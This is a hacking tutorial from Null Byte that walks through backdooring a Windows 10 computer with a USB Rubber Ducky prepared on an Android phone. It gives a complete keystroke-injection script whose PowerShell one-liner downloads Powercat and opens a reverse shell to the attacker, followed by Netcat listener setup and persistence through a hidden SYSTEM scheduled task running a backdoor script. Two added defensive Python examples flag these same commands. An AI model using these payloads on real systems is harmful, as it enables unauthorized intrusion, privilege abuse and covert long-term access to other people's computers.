
Android for Hackers: Backdoor Windows 10 with an Android Phone and USB Rubber Ducky « Null Byte :: WonderHowTo



With an unobtrusive Android phone and a USB flash drive, an attacker could compromise a Windows 10 computer in less than 15 seconds. Once a root shell has been established, long-term persistence for the backdoor can be configured with just two simple commands, bypassing antivirus software and Windows Defender.

How this Attack Works

Powercat is a fully functional PowerShell module. It works much like Netcat and lets PowerShell users create TCP and UDP tunnels with simple command-line arguments. A PowerShell payload is created that downloads, imports, and runs Powercat in a single command. It is then encoded into a binary format that the USB Rubber Ducky can understand.

The USB Rubber Ducky runs Powercat on Windows 10 as an administrator, which quickly establishes a root shell back to the attacker's Netcat listener. At that point, persistence is configured with the schtasks command, which Microsoft provides to automate tasks and commands in Windows 10.

Prerequisites

Some hardware is required for this hack, which some of you might already have lying around. The four main items are listed below.

1. USB Rubber Ducky

The USB Rubber Ducky identifies itself as a keyboard when plugged into a computer and then automatically types pre-programmed malicious commands. The payload can be adjusted to perform a variety of advanced exploits. Prices for the USB Rubber Ducky from Hak5 start at $45.


The USB Rubber Ducky without its case. Image by tokyoneon / Null Byte

As an alternative to the USB Rubber Ducky, the NetHunter and DroidDucky projects can give Android devices keystroke-injection capabilities. This requires modifying the Android operating system, which is beyond the scope of this article. Both NetHunter and DroidDucky are fantastic projects for anyone willing to change the operating system of their phone. Imagine connecting an Android phone to a computer and running complex PowerShell payloads in seconds, with no USB Rubber Ducky required.

2. Android device with UserLAnd installed

Any Android phone or tablet running the UserLAnd app will work. The device does not need to be rooted. All that is required is Internet access over Wi-Fi and the UserLAnd app already mentioned.


3. OTG adapter (conditional)

After the PowerShell payload is created (in a later step), it must be moved to the microSD card inside the USB Rubber Ducky. Some Android phone and tablet models come with a microSD expansion slot for extra storage. If your device has one, this is easy: you can transfer the file through that slot.

If your device does not have a microSD slot, you will need an On-The-Go adapter (OTG) that allows you to connect memory cards to your device through the charging port. An all-in-one solution would be the Monoprice USB-C microSD reader if your phone has a USB Type-C port. Lexar offers a similar product for micro-USB ports.

Since the USB Rubber Ducky comes with a microSD-to-USB adapter, you can instead opt for an OTG adapter with a female USB Type-A end for the microSD adapter to plug into. If your Android device has a USB-C port, Aukey offers a good adapter. There are many low-cost options for micro-USB ports, such as the Ugreen cable.

image by tokyoneon / Null Byte

Alternatively, any combination of adapters can do the job. As you can see below, I'm using an Aukey adapter paired with an Anker portable card reader.

Image by tokyoneon / Null Byte

4. Virtual Private Server (optional)

Whether or not a Virtual Private Server (VPS) is required depends on the attack scenario. When a Wi-Fi network is shared with the target device, embedding the attacker's local IP address into the payload works fine. In other scenarios, it may be necessary to deploy a VPS or Ngrok server.

Step 1: Getting Started with UserLAnd

Before proceeding, read Distortion's guide to turning an Android phone into a hacking device without root and my guide to hacking WPA2 Wi-Fi passwords with Android, as they cover the basics of UserLAnd, setting up Kali Linux and Ngrok, and installing the software this article builds on. You must install and configure UserLAnd, create a new file system, and connect to the operating system over SSH using ConnectBot (or JuiceSSH or the built-in SSH client).

Step 2: Update the System and Install Essential Software

As with any Unix-based device, make sure the installed packages are up to date before proceeding. Update the system, install the required software, and install Java (needed by the USB Rubber Ducky payload encoder) using the following commands.

  sudo apt-get update && sudo apt-get dist-upgrade

This command may take several minutes, depending on the available Internet speed and Android CPU. Older Android devices take longer to download and decompress packages.

Use the following command to install the required software.

  sudo apt-get update && sudo apt-get install net-tools netcat gnupg curl wget git nano screen

Java is needed to compile Ducky payloads. Use the following command to install it.

  sudo apt-get install default-jre-headless 

Restart the Android device to make sure all package and kernel updates take effect the next time you launch the Kali OS in UserLAnd.

Step 3: Starting the Netcat Listener

There are several ways to set up the Netcat listener that provides remote access to the Windows target computer, depending on the attack scenario.

In any case, it is a good idea to use Screen so that terminal sessions persist even when SSH connections are closed. With Screen, users can manage multiple terminal sessions in the same console. Readers are encouraged to learn how to use Screen, as it simplifies navigating and "detaching" from multiple terminal sessions without losing data.

To start a new screen session, simply enter screen.

  screen 

Then use the ifconfig -a command to identify the local IP address used by the system. This IP is needed in the next step when the payload is created.

  ifconfig -a
  wlan0: flags=4163  mtu 1500
        inet 192.168.0.208  netmask 255.255.255.0  broadcast 192.168.0.255
        inet6 ::::: prefixlen 64  scopeid 0x20
        unspec 00-00-00-00-00-00-00-00-00-00-00-00-00-00-00-00  txqueuelen 1000  (UNSPEC)
        RX packets 95745  bytes 115985231 (110.6 MiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 44735  bytes 4289090 (4.0 MiB)
        TX errors 0  dropped 0  overruns 0  carrier 0  collisions 0

Many interfaces will be listed in the UserLAnd Kali OS. The "wlan0" or "wlan1" interface most likely carries the device's local IP address (192.168.0.208). VPS users instead embed the external IP address they use when SSHing into the server. Ngrok users must set up a server and embed its URL in the payload.

Finally, start the Netcat Listener with the following command.

  netcat -vv -l -p 1234 

Netcat is told to listen ( -l ) on port ( -p ) 1234 on every available interface. The -vv (very verbose) flag prints the target's IP address in the terminal when a new connection is made.

Step 4: Create the Payload

After the Android device has rebooted, launch the UserLAnd app and SSH into the Kali system. Use nano to create a new "payload.txt" file in your home directory ( ~/ ). This file holds the Ducky payload in plain text.

  nano ~/payload.txt

Comments ( REM ) have been added to explain the function of each payload line.

  REM This first delay pauses the Ducky for 5.5 seconds to give the target
  REM operating system some time to mount the USB as a keyboard device.
  DELAY 5500
  REM Opens the Windows Run prompt.
  GUI r
  REM Delays by 0.7 seconds to give the Run prompt time to open.
  DELAY 700
  REM Specifies the PowerShell payload.
  STRING powershell /w 1 /C $a=$env:TEMP;Set-ExecutionPolicy Bypass;wget https://cutt.ly/cW13i -o $a\d.ps1;ipmo $a\d.ps1;powercat -c 192.168.0.208 -p 1234 -e powershell
  REM Presses Ctrl + Shift + Enter to run PowerShell with administrator privileges.
  CTRL-SHIFT ENTER
  REM Delays 0.85 seconds for the UAC prompt to open.
  DELAY 850
  REM Presses Alt + Y to bypass User Account Control.
  ALT y

There's a lot going on in this PowerShell one-liner; it consists of several commands separated by semicolons.

  • $a=$env:TEMP - The target's temporary directory is stored in the variable $a. This variable is used twice later in the script: first as the output directory for powercat.ps1, then again on import. Using a single-letter variable shortens the overall payload, which is more effective than spelling out "C:\Users\%USERNAME%\AppData\Local\Temp" in the payload.
  • Set-ExecutionPolicy Bypass - The execution policy is a PowerShell security feature that blocks many PowerShell payloads like this one. In several tests, I found that setting the -ExecutionPolicy option was not enough to get past this security feature. As administrator (root), the policy can be bypassed.
  • wget https://cutt.ly/cW13i -o $a\d.ps1 - PowerShell is told to make a web request ( wget ) for powercat.ps1 using the shortened cutt.ly URL. This URL points directly at the Powercat GitHub page but can be replaced with the full URL or another shortened URL. The powercat.ps1 file is saved in the temporary directory ( $a ) under the file name "d.ps1" ( -o ). The file name was shortened to a single letter to keep the Ducky payload as short as possible.
  • ipmo $a\d.ps1 - The PowerShell Import-Module function is called by its alias ipmo ; again, the shorter form keeps the Ducky payload short. This imports powercat.ps1.
  • powercat -c 192.168.0.208 -p 1234 -e powershell - Finally, Powercat runs and is instructed to connect ( -c ) to the attacker's server ( 192.168.0.208 ) on port ( -p ) 1234 and execute ( -e ) PowerShell once the connection is established. This effectively gives the attacker a root PowerShell terminal.
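From the defender's side, the chain above leaves a recognisable trace in process command lines and PowerShell script-block logs. The following Python is an added example, not part of the original article or of the Powercat project: it scores command lines for the indicators the one-liner combines (execution-policy bypass, hidden window, a download cradle, in-memory execution, a module import from a variable-built path, and a shell handed to a remote socket) and reports lines that cross a threshold. The indicator names, patterns, weights, threshold and the three sample lines are this example's own constructions; the samples reproduce the article's one-liner and backdoor script next to a benign administrative command.

```python
import re
from typing import List, NamedTuple, Tuple


class Finding(NamedTuple):
    line_no: int
    score: int
    indicators: Tuple[str, ...]
    command: str


# (name, pattern, weight): one entry per link of the chain the one-liner builds.
# Names, patterns and weights are this example's own, not a published ruleset.
INDICATORS = [
    ("execution policy bypass",
     re.compile(r"Set-ExecutionPolicy\s+Bypass|[-/]e(xecutionpolicy|p)\s+Bypass", re.I), 2),
    ("hidden window",
     re.compile(r"[-/]w(indowstyle)?\s+(1|hidden)\b", re.I), 1),
    ("download cradle",
     re.compile(r"\b(wget|iwr|curl|Invoke-WebRequest|DownloadString|DownloadFile)\b", re.I), 2),
    ("in-memory execution",
     re.compile(r"\bIEX\b|Invoke-Expression", re.I), 2),
    ("module import from variable-built path",
     re.compile(r"\b(ipmo|Import-Module)\s+\$", re.I), 2),
    ("shell bound to remote socket",
     re.compile(r"\b(powercat|ncat|nc)\b.*\s-c\s+\S+.*\s-e\s+(powershell|cmd)", re.I), 3),
]

# Lines scoring at or above this are reported; chosen so that a lone
# "-ep Bypass" or hidden-window switch stays below the bar.
SUSPICIOUS_THRESHOLD = 4


def score_command(command: str) -> Tuple[int, Tuple[str, ...]]:
    """Return (total weight, names of matched indicators) for one command line."""
    hits = [(name, weight) for name, pattern, weight in INDICATORS if pattern.search(command)]
    return sum(weight for _, weight in hits), tuple(name for name, _ in hits)


def triage(command_lines: List[str]) -> List[Finding]:
    """Score every command line and keep those that cross the threshold."""
    findings = []
    for line_no, command in enumerate(command_lines, start=1):
        score, hits = score_command(command)
        if score >= SUSPICIOUS_THRESHOLD:
            findings.append(Finding(line_no, score, hits, command))
    return findings


# Constructed sample: the article's one-liner and backdoor.ps1 body, as a
# process-creation or script-block log would record them, plus a benign line.
SAMPLE_COMMAND_LINES = [
    r"powershell /w 1 /C $a=$env:TEMP;Set-ExecutionPolicy Bypass;wget https://cutt.ly/cW13i -o $a\d.ps1;ipmo $a\d.ps1;powercat -c 192.168.0.208 -p 1234 -e powershell",
    "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.0.208 -p 2 -e powershell",
    "powershell -NoProfile -Command Get-Process | Sort-Object CPU -Descending",
]

if __name__ == "__main__":
    for finding in triage(SAMPLE_COMMAND_LINES):
        print(f"line {finding.line_no}: score {finding.score} -> {', '.join(finding.indicators)}")
```

The weighting is deliberately additive: none of the individual switches is malicious on its own, but the one-liner needs all of them together, and that combination is what the triage keys on.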

The REM comments can remain in the payload; they have no effect on the keystrokes. To save and exit nano, press Ctrl-X, then Y, then Enter.

Step 5: Encode the Payload

USB Rubber Ducky payloads cannot be loaded onto the microSD card in plain text. Instead, the Hak5 Duck Encoder is used to convert the plaintext payload into a binary format.

To clone the Duck Encoder repository, use the following command.

  git clone https://github.com/hak5darren/USB-Rubber-Ducky/

Change ( cd ) into the newly created Encoder/ directory.

  cd USB-Rubber-Ducky/Encoder/

Then encode payload.txt with the command below. It uses the encoder.jar file to convert the input file ( -i ) into the required binary file "inject.bin" ( -o ). The output file name is not arbitrary: it must be "inject.bin" for the Ducky to inject keystrokes.

  java -jar encoder.jar -i ~/payload.txt -o inject.bin
  Hak5 Duck Encoder 2.6.4

Loading file .... [ OK ]
Keyboard file is loading .... [ OK ]
Loading language file ... [ OK ]
Loading DuckyScript ..... [ OK ]
DuckyScript Complete ..... [ OK ] 

When this is done, there will be a new "inject.bin" file in the Encoder / directory. This can be checked with the following command ls -l .

  ls -l
  -rw-r--r--. 1 root root  1466 Jan 11 11:39 README
  -rw-r--r--. 1 root root 57535 Jan 11 11:39 encoder.jar
  -rw-r--r--. 1 root root    86 Jan 12 01:57 inject.bin
  drwxr-xr-x. 2 root root  4096 Jan 11 11:39 resources
  drwxr-xr-x. 2 root root  4096 Jan 11 11:39 src

Step 6: Connect the Ducky MicroSD to the Android device

Insert the Ducky microSD card into the Android device using the card reader adapter, the internal microSD card slot, or the OTG adapter with card reader. The contents of the microSD card can be viewed with the Android Downloads app.

Image by tokyoneon / Null Byte

After a few seconds, a new removable disk appears in the Downloads app. Navigate back to the Kali OS terminal. The Kali operating system does not have access to external storage devices such as the microSD card, so "inject.bin" must first be copied ( cp ) to the /sdcard/Download/ directory and then copied to the microSD card using the Android operating system.

  cp ~/USB-Rubber-Ducky/Encoder/inject.bin /sdcard/Download/

And now it's available in the Downloads app.

Highlight "inject.bin" and tap the "Copy To" button. Then copy it to the microSD card and safely eject the microSD card from the Android device.

Step 7: Start Hacking

Insert the USB Rubber Ducky into the Windows 10 target computer and switch back to the Netcat listener running on the Android device.

  nc -vv -l -p 1234
  Ncat: Version 7.70 (https://nmap.org/ncat)

  Ncat: Connection from 192.168.0.33.
  Ncat: Connection from 192.168.0.33:49672.
  Windows PowerShell
  Copyright (C) Microsoft Corporation. All rights reserved.

  PS C:\Windows\system32>

Netcat reports a new "Connection from xx.xx.xx.xx" with the target's IP address. Executing a command such as ls or pwd lists the files in the current directory or prints the current directory name. The session is ready to use.

Step 8: Setting Persistence (optional)

With the reverse shell established, the next step is to set up persistence in case the current connection is lost. This step is optional but recommended if long-term access is desired. Windows 10 offers several ways to create persistence; the following is one option.

The schtasks command can schedule tasks that Windows 10 runs automatically. For example, Windows 10 could be made to connect to the attacker's server every X minutes, where X is an arbitrary period such as 10 or 120 minutes.

To keep the target from noticing the PowerShell pop-up, even for a split second, schtasks has a useful option that runs the command only when the computer is idle. Only when the screen has gone to sleep or the screensaver is active does it attempt to connect to the attacker's server. This is ideal when the terminal pop-up should run only while the PC's owner is away from the device.

The schtasks command has a limit of ~175 characters, which makes running long commands a challenge. To work around this quickly, first create a backdoor.ps1 containing the Powercat download, import, and run commands.

  echo "IEX (New-Object System.Net.Webclient).DownloadString('https://raw.githubusercontent.com/besimorhino/powercat/master/powercat.ps1'); powercat -c 192.168.0.208 -p 2 -e powershell" > C:\ProgramData\Microsoft\Windows\backdoor.ps1

The Microsoft\Windows directory under ProgramData is used to store backdoor.ps1, but this location is entirely optional. The directory and file name can be changed to better disguise the script's location and keep the target from stumbling upon it. Likewise, the port number ( -p 2 ) can be changed to another port.

You can then use schtasks to run "backdoor.ps1" whenever the computer is idle.

  schtasks /create /f /ru "NT AUTHORITY\SYSTEM" /tn "Backdoor" /tr "Powershell -w 1 -ep Bypass C:\ProgramData\Microsoft\Windows\backdoor.ps1" /sc onidle /i 1
  SUCCESS: The scheduled task "Backdoor" has successfully been created.

The schtasks command creates a task named ( /tn ) "Backdoor". The task to run ( /tr ) executes the backdoor.ps1 script. The schedule type ( /sc ) is set to "onidle", which tells the computer to run the command only when the device is idle. Finally, the idle time in minutes is given by the /i argument and set to 1 minute.

In short, one minute after the target steps away from the computer, Windows attempts to execute the backdoor.ps1 file stored in the Microsoft directory. Note: when the target returns to the computer, Windows 10 automatically terminates the connection. The connection persists only while the target is away from the computer. Simply restart the Netcat listener and wait for the computer to become idle again; each time it does, a new connection attempt is made.
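An administrator checking a machine for this kind of persistence can export each task with schtasks /Query /TN name /XML and look for the combination this step describes: an idle trigger, a SYSTEM principal, and a PowerShell action with a hidden window, an execution-policy bypass and a script under ProgramData. The Python below is an added example, not code from the article: it parses Task Scheduler XML with the standard library and lists those traits, and it also reads the IdleSettings block, whose StopOnIdleEnd value is the setting behind the behaviour noted above (the task is stopped, and the connection with it, as soon as the user returns). Both task documents are constructed for the example: the first models the "Backdoor" task from this step, the second a benign vendor updater. Real exports are UTF-16; read them with that encoding before passing the text in.

```python
import re
import xml.etree.ElementTree as ET

# Task Scheduler 2.0 schema namespace carried by every exported task document.
NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Constructed sample modelled on the "Backdoor" task created above: idle trigger,
# SYSTEM principal (S-1-5-18), /i 1 expressed as an ISO duration of PT1M.
SUSPICIOUS_TASK_XML = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <IdleTrigger>
      <Enabled>true</Enabled>
    </IdleTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>S-1-5-18</UserId>
      <RunLevel>HighestAvailable</RunLevel>
    </Principal>
  </Principals>
  <Settings>
    <IdleSettings>
      <Duration>PT1M</Duration>
      <WaitTimeout>PT1H</WaitTimeout>
      <StopOnIdleEnd>true</StopOnIdleEnd>
      <RestartOnIdle>false</RestartOnIdle>
    </IdleSettings>
  </Settings>
  <Actions Context="Author">
    <Exec>
      <Command>Powershell</Command>
      <Arguments>-w 1 -ep Bypass C:\ProgramData\Microsoft\Windows\backdoor.ps1</Arguments>
    </Exec>
  </Actions>
</Task>
"""

# Constructed benign sample: a daily vendor updater running as an ordinary user.
BENIGN_TASK_XML = r"""
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>
    <CalendarTrigger>
      <StartBoundary>2019-01-01T03:00:00</StartBoundary>
      <ScheduleByDay><DaysInterval>1</DaysInterval></ScheduleByDay>
    </CalendarTrigger>
  </Triggers>
  <Principals>
    <Principal id="Author">
      <UserId>DESKTOP\alice</UserId>
      <RunLevel>LeastPrivilege</RunLevel>
    </Principal>
  </Principals>
  <Actions Context="Author">
    <Exec>
      <Command>C:\Program Files\ExampleVendor\updater.exe</Command>
      <Arguments>/silent</Arguments>
    </Exec>
  </Actions>
</Task>
"""


def _parse(xml_text: str) -> ET.Element:
    # Drop any XML declaration so text decoded from a UTF-16 export parses cleanly.
    return ET.fromstring(re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text).strip())


def _text(root: ET.Element, path: str) -> str:
    node = root.find(path, NS)
    return (node.text or "").strip() if node is not None else ""


def audit_task_xml(xml_text: str) -> list:
    """Return the list of suspicious traits found in one exported task document."""
    root = _parse(xml_text)
    findings = []
    if root.find("t:Triggers/t:IdleTrigger", NS) is not None:
        findings.append("idle trigger")
    user = _text(root, "t:Principals/t:Principal/t:UserId")
    if user == "S-1-5-18" or user.upper().endswith("SYSTEM"):
        findings.append("runs as SYSTEM")
    if _text(root, "t:Principals/t:Principal/t:RunLevel") == "HighestAvailable":
        findings.append("highest run level")
    command = _text(root, "t:Actions/t:Exec/t:Command")
    args = _text(root, "t:Actions/t:Exec/t:Arguments")
    if "powershell" in command.lower():
        findings.append("powershell action")
    if re.search(r"[-/]w(indowstyle)?\s+(1|hidden)\b", args, re.I):
        findings.append("hidden window")
    if re.search(r"[-/]e(xecutionpolicy|p)\s+bypass", args, re.I):
        findings.append("execution policy bypass")
    if re.search(r"\\(ProgramData|Temp|AppData)\\", command + " " + args, re.I):
        findings.append("script under ProgramData/Temp/AppData")
    return findings


def idle_settings(xml_text: str) -> dict:
    """Expose the idle duration and StopOnIdleEnd flag that govern an idle-triggered task."""
    root = _parse(xml_text)
    return {
        "duration": _text(root, "t:Settings/t:IdleSettings/t:Duration"),
        "stop_on_idle_end": _text(root, "t:Settings/t:IdleSettings/t:StopOnIdleEnd"),
    }


if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_TASK_XML), ("benign", BENIGN_TASK_XML)):
        print(label, audit_task_xml(doc), idle_settings(doc))
```

Any one trait is common in legitimate tasks; the audit is meant to be read as a whole, with an idle trigger plus SYSTEM plus a hidden PowerShell script outside Program Files being the pattern worth a closer look.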

In another screen session, create a new Netcat listener and wait for the Windows computer to be idle.

  nc -vv -l -p 2
  Ncat: Version 7.70 (https://nmap.org/ncat)

  Ncat: Connection from 192.168.0.33.
  Ncat: Connection from 192.168.0.33:24276.
  Windows PowerShell
  Copyright (C) Microsoft Corporation. All rights reserved.

  PS C:\Windows\system32>

There is a lot of fun to be had with schtasks. To learn more about the available arguments, use the commands schtasks /? and schtasks /Create /? as shown below.

  schtasks /Create /?

More Android and PowerShell Hacks to Come

An Android device and a small USB device in the hands of an attacker can wreak havoc on a Windows computer network. With only 15 seconds of physical access required to run the payload, an administrator shell can be established that lets the attacker embed long-term persistence in the device.

Android with UserLAnd makes a great hacking device, but it has some limitations. The CPU is not up to running full frameworks such as Metasploit, Empire, and Wine. Future articles will look at advanced post-exploitation attacks; for example, capturing keystrokes and recording audio from the microphone can be done using only Android and PowerShell.

Cover image and screenshots by tokyoneon / Null Byte
